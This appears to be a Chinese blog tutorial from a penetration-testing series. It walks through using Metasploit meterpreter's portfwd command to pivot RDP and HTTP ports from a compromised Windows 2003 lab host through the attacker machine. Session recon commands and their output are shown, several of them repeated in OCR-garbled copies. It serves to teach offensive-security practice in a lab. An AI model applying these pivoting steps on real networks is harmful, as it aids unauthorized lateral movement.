专注APT攻击与防御

https://micropoor.blogspot.com/

**注:**请多喝点热水或者凉白开,可预防**肾结石,通风**等。 痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。

portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。并且 内置于meterpreter。其中exe单版本源码如下:

https://github.com/rssnsj/portfwd

- **攻击机**: 192.168.1.5 Debian
- **靶机:** 192.168.1.4 Windows 7 192.168.1.119 Windows 2003

```
1 msf exploit(multi/handler) > sessions -1
2
3 Active sessions
4 ================
5
  Id Name Type Information Connection
6
7
  1 meterpreter x86/windows WIN03X64\Administrator @ WIN03X64
8
192.168.1.5:45303 -> 192.168.1.119:53 (192.168.1.119)
9
10 msf exploit(multi/handler) > sessions -i 1 -c 'ipconfig'
  [*] Running 'ipconfig' on meterpreter session 1 (192.168.1.119)
11
12
13 Windows IP Configuration
14
15
  Ethernet adapter 本地连接:
16
17
   Connection-specific DNS Suffix . :
18
   19
  20
   Default Gateway . . . . . . . . . : 192.168.1.1
21
22
```

| <u>msf</u> exploit( <b>multi/handle</b> r) > sessions -l                                                                                    |  |                         |                                   |                                                       |  |  |
|----------------------------------------------------------------------------------------------------|--|-------------------------|-----------------------------------|-------------------------------------------------------|--|--|
| Active sessions                                                                                                    |  |                         |                                   |                                                       |  |  |
| Id Name Type Information Connection                                                                                                    |  |                         |                                   | Connection                                            |  |  |
| 1                                                                                                    |  | meterpreter x86/windows | WIN03X64\Administrator @ WIN03X64 | 192.168.1.5:45303 -> 192.168.1.119:53 (192.168.1.119) |  |  |
| <u>msf</u> exploit( <b>multi/handle</b> r) > sessions -i 1 -c 'ipconfig'<br>[*] Running 'ipconfig' on meterpreter session 1 (192.168.1.119) |  |                         |                                   |                                                       |  |  |
| Windows IP Configuration                                                                                                    |  |                         |                                   |                                                       |  |  |
| Ethernet adapter 本地连接:                                                                                                    |  |                         |                                   |                                                       |  |  |
| Connection-specific DNS Suffix . :<br>IP Address : 192.168.1.119<br>Subnet Mask : 255.255.255.0<br>Default Gateway : 192.168.1.1            |  |                         |                                   |                                                       |  |  |

靶机IP为:192.168.1.119---windows 2003---x64

需要转发端口为:80,3389

```
1 msf exploit(multi/handler) > sessions -i 1
2 [*] Starting interaction with 1...
3
4 meterpreter > shell
5 Process 4012 created.
6 Channel 56 created.
7 Microsoft Windows [版本 5.2.3790]
8 (C) 版权所有 1985-2003 Microsoft Corp.
9
10 C:\Documents and Settings\Administrator\桌面>if defined PSModulePath
(echo ok!) else (echo sorry!)
11 if defined PSModulePath (echo ok!) else (echo sorry!)
12 sorry!
13
14 C:\Documents and Settings\Administrator\桌面>net config Workstation
15 net config Workstation
16 计算机名 \\WIN03X64
17 计算机全名 win03x64
18 用户名 Administrator
19
  工作站正运行于
20
   NetbiosSmb (0000000000)
21
    NetBT_Tcpip_{37C12280-A19D-4D1A-9365-6CBF2CAE5B07} (000C2985D67D)
22
23
24 软件版本 Microsoft Windows Server 2003
25
```

```
工作站域 WORKGROUP
26
27 登录域 WIN03X64
28
29 COM 打开超时 (秒) 0
30 COM 发送计数 (字节) 16
31 COM 发送超时 (毫秒) 250
  命令成功完成。
32
33
34
35 C:\Documents and Settings\Administrator\桌面>netstat -an findstr "LIST
ENING"
36 netstat -an findstr "LISTENING"
  TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
37
38
  TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
  TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
39
   TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
40
  TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING
41
   TCP 0.0.0.0:3078 0.0.0.0:0 LISTENING
42
   TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
43
   TCP 0.0.0.0:9001 0.0.0.0:0 LISTENING
44
   TCP 127.0.0.1:2995 0.0.0.0:0 LISTENING
45
   TCP 127.0.0.1:9000 0.0.0.0:0 LISTENING
46
   TCP 127.0.0.1:9999 0.0.0.0:0 LISTENING
47
   TCP 192.168.1.119:139 0.0.0.0:0 LISTENING
48
49
```

msf exploit(multi/handler) > sessions -i 1 [\*] Starting interaction with 1... <u>meterpreter</u> > shell Process 4012 created. Channel 56 created. Microsoft Windows [版本 5.2.3790] (C) 版权所有 1985-2003 Microsoft Corp. C:\Documents and Settings\Administrator\桌面>if defined PSModulePath (echo ok!) else (echo sorry!) if defined PSModulePath (echo ok!) else (echo sorry!) sorry! C:\Documents and Settings\Administrator\桌面>net config Workstation net config Workstation \\WIN03X64 计算机名 计算机全名 win03x64 用户名 Administrator 工作站正运行于 NetbiosSmb (00000000000) NetBT\_Tcpip\_{37C12280-A19D-4D1A-9365-6CBF2CAE5B07} (000C2985D67D) 软件版本 Microsoft Windows Server 2003 工作站域 WORKGROUP 登录域 WIN03X64 COM 打开超时(秒) Θ COM 发送计数(字节) 16 COM 发送超时(毫秒) 250 命令成功完成。 C:\Documents and Settings\Administrator\桌面>netstat -an|findstr "LISTENING" netstat -an|findstr "LISTENING" TCP 0.0.0.0:80 0.0.0.0:0LISTENING TCP 0.0.0.0:00.0.0.0:135 LISTENING TCP 0.0.0.0:445 0.0.0.0:0LISTENING LISTENING TCP 0.0.0.0:1025 0.0.0.0:0 TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING TCP 0.0.0.0:3078 0.0.0.0:0LISTENING TCP 0.0.0.0:00.0.0.0:3389 LISTENING TCP 0.0.0.0:00.0.0.0:9001LISTENING TCP 127.0.0.1:2995 0.0.0.0:0LISTENING 127.0.0.1:9000 TCP 0.0.0.0:0LISTENING TCP 127.0.0.1:9999 0.0.0.0:0LISTENING 0.0.0.0:0 TCP 192.168.1.119:139 LISTENING

```
1 meterpreter > portfwd -h
2
  Usage: portfwd [-h] [add | delete | list | flush] [args]
3
4
5 OPTIONS:
6
   -L <opt> Forward: local host to listen on (optional). Reverse: local
7
host to connect to.
  -R Indicates a reverse port forward.
8
9
   -h Help banner.
   -i <opt> Index of the port forward entry to interact with (see the "]
10
ist" command).
```

```
11 -1 <opt> Forward: local port to listen on. Reverse: local port to cornect to.
12 -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
13 -r <opt> Forward: remote host to connect to.
14
```

<u>meterpreter</u> > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

L <opt> Forward: local host to listen on (optional). Reverse: local host to connect to.
 R Indicates a reverse port forward.
 -h Help banner.
 -i <opt> Index of the port forward entry to interact with (see the "list" command).
 -l <opt> Forward: local port to listen on. Reverse: local port to connect to.
 -p <opt> Forward: remote port to connect to. Reverse: remote port to listen on.
 -r <opt> Forward: remote host to connect to.

攻击机执行:

| 1 | <pre>meterpreter &gt; portfwd add -1 33389 -r 192.168.1.119 -p 3389</pre>                                      |
|---|----------------------------------------------------------------------------------------------------|
| 2 | [*] Local TCP relay created: :33389 <-> 192.168.1.119:3389                                                     |
| 3 | <pre>meterpreter &gt; portfwd add -1 30080 -r 192.168.1.119 -p 80</pre>                                        |
| 4 | [*] Local TCP relay created: :30080 <-> 192.168.1.119:80                                                       |
| 5 | meterpreter > portfwd                                                                                          |
| 6 | i de la construcción de la construcción de la construcción de la construcción de la construcción de la constru |
| 7 | Active Port Forwards                                                                                           |
| 8 |                                                                                                    |
| 9 |                                                                                                    |
| 1 | 0 Index Local Remote Direction                                                                                 |
| 1 | 1                                                                                                    |
| 1 | 2 1 0.0.0.33389 192.168.1.119:3389 Forward                                                                     |
| 1 | 3 2 0.0.0.30080 192.168.1.119:80 Forward                                                                       |
| 1 | 4                                                                                                    |
| 1 | 5 2 total active port forwards.                                                                                |

meterpreter > portfwd add -l 33389 -r 192.168.1.119 -p 3389
[\*] Local TCP relay created: :33389 <-> 192.168.1.119:3389
meterpreter > portfwd add -l 30080 -r 192.168.1.119 -p 80
[\*] Local TCP relay created: :30080 <-> 192.168.1.119:80

| <u>meterpreter</u> > portfwd  |                                |                                        |                    |  |
|-------------------------------|--------------------------------|----------------------------------------|--------------------|--|
| Active Port Forwards          |                                |                                        |                    |  |
| Index                         | Local                          | Remote                                 | Direction          |  |
| 1<br>2                        | 0.0.0.0:33389<br>0.0.0.0:30080 | 192.168.1.119:3389<br>192.168.1.119:80 | Forward<br>Forward |  |
| 2 total active port forwards. |                                |                                        |                    |  |

查看攻击机LISTEN端口:转发已成功

| 1 | root | t <mark>@</mark> ] | Joł | <mark>n:</mark> ~# 1 | netstat · | -ntlp  grep | :3     |           |
|---|------|--------------------|-----|----------------------|-----------|-------------|--------|-----------|
| 2 | tcp  | 0                  | 0   | 0.0.0                | .0:33389  | 0.0.0.0:*   | LISTEN | 2319/ruby |
| 3 | tcp  | 0                  | 0   | 0.0.0                | .0:30080  | 0.0.0.0:*   | LISTEN | 2319/ruby |
| 4 |      |                    |     |                      |           |             |        |           |

| root@John:~# netstat -ntlp  grep :3 |   |                 |         |        |           |
|-------------------------------------|---|-----------------|---------|--------|-----------|
| tcp                                 | 0 | 0 0.0.0.0:33389 | 0.0.0:* | LISTEN | 2319/ruby |
| tcp                                 | 0 | 0 0.0.0.0:30080 | 0.0.0.0 | LISTEN | 2319/ruby |

Windows 7 分别访问攻击机33389, 30080, 既等价访问靶机3389, 80

| 홍코쥅 Windows                            |  |  |  |  |  |
|----------------------------------------|--|--|--|--|--|
|                                        |  |  |  |  |  |
| Windows Server 2003 R2                 |  |  |  |  |  |
| Enterprise x64 Edition                 |  |  |  |  |  |
| Copyright © 2005 Microsoft Corporation |  |  |  |  |  |
|                                        |  |  |  |  |  |
| 用户名(11)                                |  |  |  |  |  |
|                                        |  |  |  |  |  |
| 密码 (E):                                |  |  |  |  |  |
|                                        |  |  |  |  |  |
| 确定                                     |  |  |  |  |  |
|                                        |  |  |  |  |  |

| 建设甲                      | × +                              |                                   |  |
|--------------------------|----------------------------------|-----------------------------------|--|
| $\leftarrow \rightarrow$ | ୯ <b>ଘ</b>                       | (i) <b>192. 168. 1. 5</b> : 30080 |  |
| ✿ 最常访问                   | ]                                |                                   |  |
| i                        | 建设中                              |                                   |  |
|                          | 您想要查看的站点当前没有默认页。可能正在对它进行升级和配置操作。 |                                   |  |
|                          | 请稍后再访问此站点。如果您仍然遇到问题,请与网站的管理员联系。  |                                   |  |

如果您是网站的管理员,并且认为您是由于错误才收到此消息,请参阅 IIS 帮助中的"启用和禁用动态内容"。

## 要访问 IIS 帮助

- 1. 单击**开始**,然后单击运行。
- 2. 在打开文本框中, 键入 inetmgr。将出现 IIS 管理器。
- 3. 从**帮助**菜单,单击**帮助主题。**
- 4. 单击Internet 信息服务。

• Micropoor